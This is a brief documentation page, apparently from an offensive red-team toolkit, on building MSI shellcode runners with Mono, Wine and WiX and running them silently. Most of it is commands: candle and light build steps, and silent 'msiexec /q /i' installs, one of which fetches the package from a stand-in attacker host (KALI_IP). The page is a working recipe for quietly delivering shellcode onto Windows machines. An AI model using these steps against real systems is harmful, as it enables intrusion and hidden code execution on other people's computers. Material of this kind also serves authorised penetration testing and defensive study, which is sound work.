# MSI Runner

> Generate and execute MSI-based shellcode runners.

Uses Mono, Wine, and an XML template. Output: `payloads/MSI/shellcode_runner.msi`.

## Steps

1. Modify `line 16` in `Templates/MSI/shellcode_runner.xml`
2. Run `apophis.sh` to generate the MSI
3. Execute:

```cmd theme={null}
msiexec /q /i shellcode_runner.msi
msiexec /q /i http://KALI_IP/shellcode_runner.msi
```

## Manual Generation

```bash theme={null}
# Create .wixobj
cd Templates/MSI/wix311-binaries
mono candle.exe -out ../ -arch x64 ../shellcode_runner.xml

# Generate .MSI
wine light.exe -out ../shellcode_runner.msi ../shellcode_runner.wixobj -sval
```
